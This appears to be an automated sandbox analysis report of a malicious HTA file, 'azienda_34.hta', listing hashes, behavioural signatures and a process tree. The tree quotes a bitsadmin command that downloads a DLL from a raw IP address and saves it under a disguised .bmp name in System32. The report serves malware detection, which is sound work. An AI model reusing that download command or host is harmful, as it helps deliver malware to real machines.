Analysis
-
max time kernel
91s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
07-02-2023 10:41
Static task
static1
Behavioral task
behavioral1
Sample
azienda_34.hta
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
azienda_34.hta
Resource
win10v2004-20220812-en
General
-
Target
azienda_34.hta
-
Size
6KB
-
MD5
ef63c63f919688dcfa706ec8ccbd36d7
-
SHA1
f5ec3767bc66821321927ac3fc3f86e5c83013e1
-
SHA256
cc79c4a6c3e6f937692746d740a2d77781cd7b8397384af5e81cbf43896e3705
-
SHA512
8b9baf968b3d9eefade0947ee10ea920f9bd036105f6f81c3a74e71a60f413904d10b1c4e2fb8e8497865b36e689281639ca9f4904348ed7fc5553dcd8f9d236
-
SSDEEP
96:weiBzTLVTUoPg2pwTEeD4b7KdaO3iOaLt3M8Mn3XTPMJsb0ODcFE+Voq3V4d296N:R0dU77rIKdn863jMM0OD9+VVF44xikuj
Malware Config
Signatures
-
Blocklisted process makes network request 9 IoCs
flow pid Process 12 4720 mshta.exe 13 4720 mshta.exe 39 4720 mshta.exe 48 4720 mshta.exe 49 4720 mshta.exe 50 4720 mshta.exe 52 4720 mshta.exe 54 4720 mshta.exe 56 4720 mshta.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 5116 bitsadmin.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4720 wrote to memory of 5116 4720 mshta.exe 82 PID 4720 wrote to memory of 5116 4720 mshta.exe 82 PID 4720 wrote to memory of 5116 4720 mshta.exe 82
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\azienda_34.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://62.173.147.3/azienda.dll C:\Windows\\System32\\LogFiles\\\login.bmp2⤵
- Download via BitsAdmin
PID:5116
-